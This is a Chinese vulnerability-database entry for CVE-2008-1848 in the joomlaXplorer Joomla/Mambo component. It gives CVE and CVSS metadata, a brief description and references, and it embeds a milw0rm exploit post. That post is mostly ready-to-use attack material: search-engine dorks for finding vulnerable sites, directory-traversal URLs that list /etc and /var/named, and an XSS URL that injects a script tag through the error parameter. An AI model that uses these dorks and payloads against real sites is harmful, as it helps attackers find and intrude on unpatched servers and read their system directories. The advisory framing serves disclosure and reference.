joomlaXplorer (com_joomlaxplorer) Mambo/Joomla! Component 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114987 漏洞类型 跨站脚本
发布时间 2008-04-11 更新时间 2008-12-19
CVE编号 CVE-2008-1848 CNNVD-ID CNNVD-200804-254
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5431
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200804-254
|漏洞详情
joomlaXplorer(com_joomlaxplorer)Mambo/Joomla!组件1.6.2及其早期版本中存在跨站脚本攻击漏洞,远程攻击者通过一个show_error操作中的错误参数到达index.php来注入任意web脚本或HTML。
|漏洞EXP
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component joomlaxplorer  
= version : 1.6.0
= Download : http://joomlacode.org/gf/project/joomlaxplorer

= Dork1 : inurl:index.php?option=com_joomlaxplorer
= Dork2 : powered by joomlaXplorer
          			           
							   
= BUG 1 :  Local Directory Traversal 

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= BUG 2 : XSS

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=[XSS]
 
example : www.target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
       

= greetz :	V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers

side note:
    <name>joomlaXplorer</name>
    <creationDate>18.09.2007</creationDate>
    <author>soeren, QuiX Project</author>
    <copyright>Soeren Eberhardt-Biermann, QuiX Project</copyright>
    <authorEmail>soeren@virtuemart.net</authorEmail>

    <authorUrl>http://joomlacode.org/gf/project/joomlaxplorer/</authorUrl>
    <version>1.6.2</version>

# milw0rm.com [2008-04-11]
|参考资料

来源:XF
名称:joomlaxplorer-index-xss(41779)
链接:http://xforce.iss.net/xforce/xfdb/41779
来源:BID
名称:28746
链接:http://www.securityfocus.com/bid/28746
来源:MILW0RM
名称:5431
链接:http://www.milw0rm.com/exploits/5431